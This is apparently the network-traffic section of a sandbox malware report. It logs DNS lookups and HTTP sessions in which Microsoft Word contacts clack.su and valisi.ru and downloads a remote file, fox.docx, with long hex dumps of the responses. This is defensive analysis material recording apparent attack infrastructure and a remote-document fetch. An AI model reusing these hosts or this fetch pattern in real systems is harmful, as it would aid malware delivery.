Apr 19, 2025 02:44:37.594063997 CEST | 192.168.2.4 | 1.1.1.1 | 0xcc09 | Standard query (0) | clack.su | A (IP address) | IN (0x0001) | false
Apr 19, 2025 02:44:38.594216108 CEST | 192.168.2.4 | 1.1.1.1 | 0xcc09 | Standard query (0) | clack.su | A (IP address) | IN (0x0001) | false
Apr 19, 2025 02:44:42.977391958 CEST | 192.168.2.4 | 1.1.1.1 | 0xe886 | Standard query (0) | valisi.ru | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 19, 2025 02:44:35.501529932 CEST | 1.1.1.1 | 192.168.2.4 | 0xad67 | No error (0) | ecs-office.s-0005.dual-s-msedge.net | s-0005.dual-s-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Apr 19, 2025 02:44:35.501529932 CEST | 1.1.1.1 | 192.168.2.4 | 0xad67 | No error (0) | s-0005.dual-s-msedge.net | | 52.123.129.14 | A (IP address) | IN (0x0001) | false
Apr 19, 2025 02:44:35.501529932 CEST | 1.1.1.1 | 192.168.2.4 | 0xad67 | No error (0) | s-0005.dual-s-msedge.net | | 52.123.128.14 | A (IP address) | IN (0x0001) | false
Apr 19, 2025 02:44:38.631468058 CEST | 1.1.1.1 | 192.168.2.4 | 0xcc09 | No error (0) | clack.su | | 91.218.228.26 | A (IP address) | IN (0x0001) | false
Apr 19, 2025 02:44:38.699384928 CEST | 1.1.1.1 | 192.168.2.4 | 0xcc09 | No error (0) | clack.su | | 91.218.228.26 | A (IP address) | IN (0x0001) | false
Apr 19, 2025 02:44:43.388605118 CEST | 1.1.1.1 | 192.168.2.4 | 0xe886 | No error (0) | valisi.ru | | 91.218.228.26 | A (IP address) | IN (0x0001) | false
        • clack.su
        • valisi.ru
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49716 | 91.218.228.26 | 80 | 7720 | C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2025 02:44:39.011279106 CEST | 321 | OUT | OPTIONS / HTTP/1.1
        Connection: Keep-Alive
        Authorization: Bearer
        User-Agent: Microsoft Office Word 2014
        X-Office-Major-Version: 16
        X-MS-CookieUri-Requested: t
        X-FeatureVersion: 1
        Accept-Auth: badger,Wlid1.1,Bearer,Basic,NTLM,Digest,Kerberos,Negotiate,Nego2
        X-MSGETWEBURL: t
        X-IDCRL_ACCEPTED: t
        Host: clack.su
Apr 19, 2025 02:44:39.876626968 CEST | 1358 | IN | HTTP/1.1 200 OK
        Connection: Keep-Alive
        Keep-Alive: timeout=5, max=100
        x-powered-by: PHP/5.4.45
        set-cookie: PHPSESSID=eba6953baf6806e6900f830f92e49542; path=/
        expires: Thu, 19 Nov 1981 08:52:00 GMT
        cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
        pragma: no-cache
        set-cookie: wfvt_733659977=6802f1f7a44ac; expires=Sat, 19-Apr-2025 01:14:39 GMT; path=/; httponly
        content-type: text/html; charset=UTF-8
        link: <http://clack.su/wp-json/>; rel="https://api.w.org/"
        transfer-encoding: chunked
        date: Sat, 19 Apr 2025 00:44:39 GMT
        server: LiteSpeed
        Data Raw: 32 32 38 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 31 31 30 30 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 41 64 76 61 6e 63 65 64 20 73 74 75 64 69 6f 22 3e 0d 0a 09 3c 74 69 74 6c 65 3e 43 6c 61 63 6b 3c 2f 74 69 74 6c 65 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 53 4b 59 50 45 5f 54 4f 4f 4c 42 41 52 22 20 63 6f 6e 74 65 6e 74 3d 22 53 4b 59 50 45 5f 54 4f 4f 4c 42 41 52 5f 50 41 52 53 45 52 5f 43 4f 4d 50 41 54 49 42 4c 45 22 20 2f 3e 0d 0a 09 0d 0a 09 3c 21 2d 2d 20 63 73 73 20 2d 2d 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 6c 61 63 6b 2e 73 75 2f 77 70 2d 63 [TRUNCATED]
        Data Ascii: 228d<!DOCTYPE html><html lang="ru"><head><meta charset="UTF-8"><meta name="viewport" content="width=1100"><meta name="author" content="Advanced studio"><title>Clack</title><meta name="SKYPE_TOOLBAR" content="SKYPE_TOOLBAR_PARSER_COMPATIBLE" />... css --><link rel="shortcut icon" href="http://clack.su/wp-content/themes/filtrest/favicon.ico"><link href='https://fonts.googleapis.com/css?family=Fira+Sans:400,300,500,700&subset=latin,cyrillic' rel='stylesheet' type='text/css'><link rel="stylesheet" href="http://clack.su/wp-content/themes/filtrest/jquery.fancybox.css" media="screen"><link rel="stylesheet" href="http://clack.su/wp-content/themes/filtrest/style.css?5" media="screen">...[if lt IE 9]> <script src="http://
Apr 19, 2025 02:44:39.876643896 CEST | 1358 | IN | Data Raw: 68 74 6d 6c 35 73 68 69 76 2e 67 6f 6f 67 6c 65 63 6f 64 65 2e 63 6f 6d 2f 73 76 6e 2f 74 72 75 6e 6b 2f 68 74 6d 6c 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 69 65 37
        Data Ascii: html5shiv.googlecode.com/svn/trunk/html5.js"></script> <script src="http://ie7-js.googlecode.com/svn/version/2.1(beta4)/IE9.js"></script> <![endif]-->... Google Tag Manager for WordPress by gtm4wp.com --><script data-cfasync="fa
Apr 19, 2025 02:44:39.876655102 CEST | 1358 | IN | Data Raw: 29 5b 30 5d 2b 22 2c 22 2b 74 5b 31 5d 2b 22 2c 22 2b 74 5b 32 5d 2b 22 2c 22 2b 74 5b 33 5d 2c 72 2e 66 69 6c 6c 54 65 78 74 28 69 28 35 35 33 35 36 2c 35 37 32 32 31 2c 35 35 33 35 36 2c 35 37 33 34 33 29 2c 30 2c 30 29 2c 61 21 3d 28 74 3d 72
        Data Ascii: )[0]+","+t[1]+","+t[2]+","+t[3],r.fillText(i(55356,57221,55356,57343),0,0),a!=(t=r.getImageData(16,16,1,1).data)[0]+","+t[1]+","+t[2]+","+t[3];case"simple":return r.fillText(i(55357,56835),0,0),0!==r.getImageData(16,16,1,1).data[0];case"unicod
        Apr 19, 2025 02:44:39.876727104 CEST | 1358 | IN | Data Raw: 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 3a
        Data Ascii: !important;}</style><link rel='stylesheet' id='contact-form-7-css' href='http://clack.su/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=4.3.1' type='text/css' media='all' /><link rel='stylesheet' id='wp-shop_style_main-css'
        Apr 19, 2025 02:44:39.876739025 CEST | 1358 | IN | Data Raw: 75 30 34 33 65 5c 75 30 34 33 31 5c 75 30 34 33 30 5c 75 30 34 33 32 5c 75 30 34 33 62 5c 75 30 34 33 35 5c 75 30 34 33 64 5c 75 30 34 33 65 20 5c 75 30 34 33 32 20 5c 75 30 34 33 61 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 37 5c 75 30
        Data Ascii: u043e\u0431\u0430\u0432\u043b\u0435\u043d\u043e \u0432 \u043a\u043e\u0440\u0437\u0438\u043d\u0443!","wrong_promocode":"\u041d\u0435\u0432\u0435\u0440\u043d\u044b\u0439 \u043f\u0440\u043e\u043c\u043e\u043a\u043e\u0434","your_promocode":"\u0412\
        Apr 19, 2025 02:44:39.876749992 CEST | 1358 | IN | Data Raw: 30 34 34 32 5c 75 30 34 33 65 5c 75 30 34 33 63 20 5c 75 30 34 33 34 5c 75 30 34 33 65 5c 75 30 34 34 31 5c 75 30 34 34 32 5c 75 30 34 33 30 5c 75 30 34 33 32 5c 75 30 34 33 61 5c 75 30 34 33 38 22 2c 22 69 74 65 6d 73 22 3a 22 5c 75 30 34 31 66
        Data Ascii: 0442\u043e\u043c \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438","items":"\u041f\u043e\u0437\u0438\u0446\u0438\u0439:","total_sum":"\u0418\u0442\u043e\u0433\u043e:","user_in":"2","submit":"\u041e\u0444\u043e\u0440\u043c\u0438\u0442\u044c \u0
        Apr 19, 2025 02:44:39.876760960 CEST | 1290 | IN | Data Raw: 69 70 74 22 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 75 72 6c 29 7b 0a 09 69 66 28 2f 28 3f 3a 43 68 72 6f 6d 65 5c 2f 32 36 5c 2e 30 5c 2e 31 34 31 30 5c 2e 36 33 20 53 61 66 61 72 69 5c 2f 35 33 37 5c 2e 33 31 7c 57 6f 72 64 66 65 6e 63 65 54 65 73
        Data Ascii: ipt">(function(url){if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; }var addEvent = function(evt, handler) {if (window.addEventListener) {document.addEventListener(evt, handl
        Apr 19, 2025 02:44:39.921441078 CEST | 1358 | IN | Data Raw: 32 30 30 61 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 76 61 72 20 5f 5f 63 61 72 74 20 3d 20 30 3b 0a 09 76 61 72 20 5f 5f 77 20 3d 20 30 3b 0a 0a 09 43 55 52 52 20 3d 20 22 d0 a0 d1
        Data Ascii: 200a<script type="text/javascript">var __cart = 0;var __w = 0;CURR = "";jQuery(document).ready(function(){if (window.Cart !== undefined){window.__cart = new window.Cart("wpshop_minicart", "wpshop_cart");
        Apr 19, 2025 02:44:39.921463966 CEST | 1358 | IN | Data Raw: 3d 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 74 29 5b 30 5d 2c 6b 2e 61 73 79 6e 63 3d 31 2c 6b 2e 73 72 63 3d 72 2c 61 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 6b 2c 61 29 7d 29 0d 0a
        Data Ascii: =e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)}) (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym"); ym(89683691, "init", { clickmap:true, trackLinks:true,
        Apr 19, 2025 02:44:40.244064093 CEST | 1358 | IN | Data Raw: 2c 0d 0a 09 6a 3d 64 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 73 29 2c 64 6c 3d 6c 21 3d 27 64 61 74 61 4c 61 79 65 72 27 3f 27 26 6c 3d 27 2b 6c 3a 27 27 3b 6a 2e 61 73 79 6e 63 3d 74 72 75 65 3b 6a 2e 73 72 63 3d 0d 0a 09 27 68 74 74 70 73
        Data Ascii: ,j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-WQ3XLCG');</script>... End Goo
        Apr 19, 2025 02:44:40.253591061 CEST | 1358 | IN | Data Raw: 65 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 22 3e 3c 2f 69 66 72 61 6d 65 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 0d 0a 09 3c 21 2d 2d 20 45 6e 64 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 28 6e 6f 73 63 72 69 70 74 29
        Data Ascii: e;visibility:hidden"></iframe></noscript>... End Google Tag Manager (noscript) --><header class="header"><div class="wrap"><a href="/" class="header-logo"></a><div class="header-phone"><div class="header-label">


        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
        1 | 192.168.2.4 | 49719 | 91.218.228.26 | 80 | 7720 | C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        Timestamp | Bytes transferred | Direction | Data
        Apr 19, 2025 02:44:40.308360100 CEST | 224 | OUT | OPTIONS / HTTP/1.1
        Authorization: Bearer
        X-MS-CookieUri-Requested: t
        X-FeatureVersion: 1
        X-IDCRL_ACCEPTED: t
        User-Agent: Microsoft Office Protocol Discovery
        Host: clack.su
        Content-Length: 0
        Connection: Keep-Alive
        Apr 19, 2025 02:44:40.837677956 CEST | 1358 | IN | HTTP/1.1 200 OK
        Connection: Keep-Alive
        Keep-Alive: timeout=5, max=100
        x-powered-by: PHP/5.4.45
        set-cookie: PHPSESSID=b9e6303e515dc6233f459e6662a37489; path=/
        expires: Thu, 19 Nov 1981 08:52:00 GMT
        cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
        pragma: no-cache
        set-cookie: wfvt_733659977=6802f1f8a0a59; expires=Sat, 19-Apr-2025 01:14:40 GMT; path=/; httponly
        content-type: text/html; charset=UTF-8
        link: <http://clack.su/wp-json/>; rel="https://api.w.org/"
        transfer-encoding: chunked
        date: Sat, 19 Apr 2025 00:44:40 GMT
        server: LiteSpeed
        Data Raw: 32 32 38 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 31 31 30 30 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 41 64 76 61 6e 63 65 64 20 73 74 75 64 69 6f 22 3e 0d 0a 09 3c 74 69 74 6c 65 3e 43 6c 61 63 6b 3c 2f 74 69 74 6c 65 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 53 4b 59 50 45 5f 54 4f 4f 4c 42 41 52 22 20 63 6f 6e 74 65 6e 74 3d 22 53 4b 59 50 45 5f 54 4f 4f 4c 42 41 52 5f 50 41 52 53 45 52 5f 43 4f 4d 50 41 54 49 42 4c 45 22 20 2f 3e 0d 0a 09 0d 0a 09 3c 21 2d 2d 20 63 73 73 20 2d 2d 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 6c 61 63 6b 2e 73 75 2f 77 70 2d 63 [TRUNCATED]
        Data Ascii: 228d<!DOCTYPE html><html lang="ru"><head><meta charset="UTF-8"><meta name="viewport" content="width=1100"><meta name="author" content="Advanced studio"><title>Clack</title><meta name="SKYPE_TOOLBAR" content="SKYPE_TOOLBAR_PARSER_COMPATIBLE" />... css --><link rel="shortcut icon" href="http://clack.su/wp-content/themes/filtrest/favicon.ico"><link href='https://fonts.googleapis.com/css?family=Fira+Sans:400,300,500,700&subset=latin,cyrillic' rel='stylesheet' type='text/css'><link rel="stylesheet" href="http://clack.su/wp-content/themes/filtrest/jquery.fancybox.css" media="screen"><link rel="stylesheet" href="http://clack.su/wp-content/themes/filtrest/style.css?5" media="screen">...[if lt IE 9]> <script src="http://
        Apr 19, 2025 02:44:40.837697029 CEST | 1358 | IN | Data Raw: 68 74 6d 6c 35 73 68 69 76 2e 67 6f 6f 67 6c 65 63 6f 64 65 2e 63 6f 6d 2f 73 76 6e 2f 74 72 75 6e 6b 2f 68 74 6d 6c 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 69 65 37
        Data Ascii: html5shiv.googlecode.com/svn/trunk/html5.js"></script> <script src="http://ie7-js.googlecode.com/svn/version/2.1(beta4)/IE9.js"></script> <![endif]-->... Google Tag Manager for WordPress by gtm4wp.com --><script data-cfasync="fa
        Apr 19, 2025 02:44:40.837713003 CEST | 1358 | IN | Data Raw: 29 5b 30 5d 2b 22 2c 22 2b 74 5b 31 5d 2b 22 2c 22 2b 74 5b 32 5d 2b 22 2c 22 2b 74 5b 33 5d 2c 72 2e 66 69 6c 6c 54 65 78 74 28 69 28 35 35 33 35 36 2c 35 37 32 32 31 2c 35 35 33 35 36 2c 35 37 33 34 33 29 2c 30 2c 30 29 2c 61 21 3d 28 74 3d 72
        Data Ascii: )[0]+","+t[1]+","+t[2]+","+t[3],r.fillText(i(55356,57221,55356,57343),0,0),a!=(t=r.getImageData(16,16,1,1).data)[0]+","+t[1]+","+t[2]+","+t[3];case"simple":return r.fillText(i(55357,56835),0,0),0!==r.getImageData(16,16,1,1).data[0];case"unicod
        Apr 19, 2025 02:44:40.837728024 CEST | 1358 | IN | Data Raw: 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 3a
        Data Ascii: !important;}</style><link rel='stylesheet' id='contact-form-7-css' href='http://clack.su/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=4.3.1' type='text/css' media='all' /><link rel='stylesheet' id='wp-shop_style_main-css'
        Apr 19, 2025 02:44:40.837770939 CEST | 1358 | IN | Data Raw: 75 30 34 33 65 5c 75 30 34 33 31 5c 75 30 34 33 30 5c 75 30 34 33 32 5c 75 30 34 33 62 5c 75 30 34 33 35 5c 75 30 34 33 64 5c 75 30 34 33 65 20 5c 75 30 34 33 32 20 5c 75 30 34 33 61 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 37 5c 75 30
        Data Ascii: u043e\u0431\u0430\u0432\u043b\u0435\u043d\u043e \u0432 \u043a\u043e\u0440\u0437\u0438\u043d\u0443!","wrong_promocode":"\u041d\u0435\u0432\u0435\u0440\u043d\u044b\u0439 \u043f\u0440\u043e\u043c\u043e\u043a\u043e\u0434","your_promocode":"\u0412\
        Apr 19, 2025 02:44:40.837795019 CEST | 1358 | IN | Data Raw: 30 34 34 32 5c 75 30 34 33 65 5c 75 30 34 33 63 20 5c 75 30 34 33 34 5c 75 30 34 33 65 5c 75 30 34 34 31 5c 75 30 34 34 32 5c 75 30 34 33 30 5c 75 30 34 33 32 5c 75 30 34 33 61 5c 75 30 34 33 38 22 2c 22 69 74 65 6d 73 22 3a 22 5c 75 30 34 31 66
        Data Ascii: 0442\u043e\u043c \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438","items":"\u041f\u043e\u0437\u0438\u0446\u0438\u0439:","total_sum":"\u0418\u0442\u043e\u0433\u043e:","user_in":"2","submit":"\u041e\u0444\u043e\u0440\u043c\u0438\u0442\u044c \u0
        Apr 19, 2025 02:44:40.837820053 CEST | 1290 | IN | Data Raw: 69 70 74 22 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 75 72 6c 29 7b 0a 09 69 66 28 2f 28 3f 3a 43 68 72 6f 6d 65 5c 2f 32 36 5c 2e 30 5c 2e 31 34 31 30 5c 2e 36 33 20 53 61 66 61 72 69 5c 2f 35 33 37 5c 2e 33 31 7c 57 6f 72 64 66 65 6e 63 65 54 65 73
        Data Ascii: ipt">(function(url){if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; }var addEvent = function(evt, handler) {if (window.addEventListener) {document.addEventListener(evt, handl
        Apr 19, 2025 02:44:40.878360987 CEST | 1358 | IN | Data Raw: 32 30 30 61 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 76 61 72 20 5f 5f 63 61 72 74 20 3d 20 30 3b 0a 09 76 61 72 20 5f 5f 77 20 3d 20 30 3b 0a 0a 09 43 55 52 52 20 3d 20 22 d0 a0 d1
        Data Ascii: 200a<script type="text/javascript">var __cart = 0;var __w = 0;CURR = "";jQuery(document).ready(function(){if (window.Cart !== undefined){window.__cart = new window.Cart("wpshop_minicart", "wpshop_cart");
        Apr 19, 2025 02:44:40.878379107 CEST | 1358 | IN | Data Raw: 3d 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 74 29 5b 30 5d 2c 6b 2e 61 73 79 6e 63 3d 31 2c 6b 2e 73 72 63 3d 72 2c 61 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 6b 2c 61 29 7d 29 0d 0a
        Data Ascii: =e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)}) (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym"); ym(89683691, "init", { clickmap:true, trackLinks:true,
        Apr 19, 2025 02:44:41.070095062 CEST | 1358 | IN | Data Raw: 2c 0d 0a 09 6a 3d 64 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 73 29 2c 64 6c 3d 6c 21 3d 27 64 61 74 61 4c 61 79 65 72 27 3f 27 26 6c 3d 27 2b 6c 3a 27 27 3b 6a 2e 61 73 79 6e 63 3d 74 72 75 65 3b 6a 2e 73 72 63 3d 0d 0a 09 27 68 74 74 70 73
        Data Ascii: ,j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-WQ3XLCG');</script>... End Goo
        Apr 19, 2025 02:44:41.070116043 CEST | 1358 | IN | Data Raw: 65 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 22 3e 3c 2f 69 66 72 61 6d 65 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 0d 0a 09 3c 21 2d 2d 20 45 6e 64 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 28 6e 6f 73 63 72 69 70 74 29
        Data Ascii: e;visibility:hidden"></iframe></noscript>... End Google Tag Manager (noscript) --><header class="header"><div class="wrap"><a href="/" class="header-logo"></a><div class="header-phone"><div class="header-label">


        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
        2 | 192.168.2.4 | 49724 | 91.218.228.26 | 80 | 7720 | C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        Timestamp | Bytes transferred | Direction | Data
        Apr 19, 2025 02:44:41.249003887 CEST | 464 | OUT | HEAD /fox.docx HTTP/1.1
        Connection: Keep-Alive
        Authorization: Bearer
        User-Agent: Microsoft Office Word 2014
        X-Office-Major-Version: 16
        X-MS-CookieUri-Requested: t
        X-FeatureVersion: 1
        Accept-Auth: badger,Wlid1.1,Bearer,Basic,NTLM,Digest,Kerberos,Negotiate,Nego2
        X-IDCRL_ACCEPTED: t
        Host: clack.su
        Cookie: PHPSESSID=b9e6303e515dc6233f459e6662a37489; wfvt_733659977=6802f1f8a0a59; wfvt_733659977=6802f1f7a44ac; PHPSESSID=eba6953baf6806e6900f830f92e49542
        Apr 19, 2025 02:44:41.626091003 CEST | 352 | IN | HTTP/1.1 200 OK
        Connection: Keep-Alive
        Keep-Alive: timeout=5, max=100
        content-type: application/vnd.openxmlformats-officedocument.wordprocessingml.document
        last-modified: Wed, 19 Mar 2025 11:29:09 GMT
        etag: "6eac-67daaa85-b8348916368e5d6e;;;"
        accept-ranges: bytes
        content-length: 28332
        date: Sat, 19 Apr 2025 00:44:41 GMT
        server: LiteSpeed


        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
        3 | 192.168.2.4 | 49726 | 91.218.228.26 | 80 | 7720 | C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        Timestamp | Bytes transferred | Direction | Data
        Apr 19, 2025 02:44:42.066957951 CEST | 255 | OUT | GET /fox.docx HTTP/1.1
        Accept: */*
        User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)
        Accept-Encoding: gzip, deflate
        Host: clack.su
        Connection: Keep-Alive
        Cookie: PHPSESSID=b9e6303e515dc6233f459e6662a37489; wfvt_733659977=6802f1f8a0a59
        Apr 19, 2025 02:44:42.439097881 CEST | 1358 | IN | HTTP/1.1 200 OK
        Connection: Keep-Alive
        Keep-Alive: timeout=5, max=100
        content-type: application/vnd.openxmlformats-officedocument.wordprocessingml.document
        last-modified: Wed, 19 Mar 2025 11:29:09 GMT
        etag: "6eac-67daaa85-b8348916368e5d6e;;;"
        accept-ranges: bytes
        content-length: 28332
        date: Sat, 19 Apr 2025 00:44:42 GMT
        server: LiteSpeed
        Data Raw: 50 4b 03 04 14 00 00 00 08 00 00 00 21 00 1e 91 1a b7 ea 00 00 00 4e 02 00 00 0b 00 00 00 5f 72 65 6c 73 2f 2e 72 65 6c 73 8d 92 51 4b c4 30 0c 80 df 05 ff 43 c9 fb 2d bb 13 44 e4 ba 7b 11 e1 de 44 e6 0f 08 6d b6 95 db da d2 46 bd fb f7 56 50 74 70 9e 7b 6c 9a 7c f9 12 b2 dd 1d a7 51 bd 71 ca 2e 78 0d eb aa 06 c5 de 04 eb 7c af e1 a5 7d 5c dd 81 ca 42 de d2 18 3c 6b 38 71 86 5d 73 7d b5 7d e6 91 a4 14 e5 c1 c5 ac 0a c5 67 0d 83 48 bc 47 cc 66 e0 89 72 15 22 fb f2 d3 85 34 91 94 67 ea 31 92 39 50 cf b8 a9 eb 5b 4c bf 19 d0 cc 98 6a 6f 35 a4 bd bd 01 d5 9e 22 2f 61 87 ae 73 86 1f 82 79 9d d8 cb 99 16 c8 47 61 6f d9 ae 62 2a f5 49 5c 99 46 b5 94 7a 16 0d 36 98 a7 12 ce 48 31 56 05 0d 78 de 68 b3 dc e8 ef 69 71 62 21 4b 42 68 42 e2 cb 3e 9f 19 97 84 d6 cb 85 fe 5f d1 3c e3 c7 e6 3d 24 8b f6 2b fc 6d 83 b3 2b 68 3e 00 50 4b 03 04 14 00 00 00 00 00 d9 41 73 5a 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 63 75 73 74 6f 6d 58 6d 6c 2f 5f 72 65 6c 73 2f 50 4b 03 04 14 00 00 00 08 00 00 00 21 00 74 3f 39 [TRUNCATED]
        Data Ascii: PK!N_rels/.relsQK0C-D{DmFVPtp{l|Qq.x|}\B<k8q]s}}gHGfr"4g19P[Ljo5"/asyGaob*I\Fz6H1Vxhiqb!KBhB>_<=$+m+h>PKAsZcustomXml/_rels/PK!t?9z(customXml/_rels/item1.xml.rels0hoPK)t;JGILcXji+t(QE]1hjP>N~j.G{JD60o,W0H9X)ctl'_u|P=;6w#wEvd*yB1kPK!&customXml/item1.xml0_e:=l"6D/9|rqu]v|y2O:WX7J.`pY'JE\k6gt&S+!mA=)~PI5#v $3bdz^)t`0m38UfsbG5{,Z}PK!McustomXml/itemProps1.xmleAk0]cE]Z^Cw&#Xix3Lss>t-{r8wiRnT3:hCv1FE*z8$6L'Sb/dZ^H eYK"
        Apr 19, 2025 02:44:42.439110994 CEST | 1358 | IN | Data Raw: 45 9b d0 b2 2b d1 72 e0 3c e8 2b 58 15 32 5c c0 c5 e1 84 de 2a 8a d2 5f 38 4e 93 d1 20 51 af 16 1c f1 22 cf 1f b9 5e 23 de 9e ed cc ba 2d cf cf f6 0b 4c e1 af dc a2 ad de fc a3 58 a3 3d 06 9c 28 d3 68 7f 01 9b 71 cd 71 a5 b0 a8 a8 2c 90 da ce 64
        Data Ascii: E+r<+X2\*_8N Q"^#-LX=(hqq,dkPK!ZCbdocProps/app.xmlSn0?7J+EbaCmL;lIXY{O#)Zz\d/>vq-D8b7>`$)c
        Apr 19, 2025 02:44:42.439124107 CEST | 1358 | IN | Data Raw: fd bc 70 01 dc fa cc ff 82 f4 15 10 69 0d 26 3d 4c 44 67 13 91 4f 92 f9 26 9c fb 70 e3 33 df 9e d4 60 cf e8 e0 c1 27 c2 fc 2f 63 58 06 7e f4 1f 5c ff 00 50 4b 03 04 14 00 00 00 08 00 ee 41 73 5a c9 5f ac 4e cc 00 00 00 4c 01 00 00 1c 00 00 00 77
        Data Ascii: pi&=LDgO&p3`'/cX~\PKAsZ_NLword/_rels/settings.xml.relsN1ws2 .:bj, *10iNQq(nAQX^A`vK&b7;E>[&RfQBJ+Wo+S
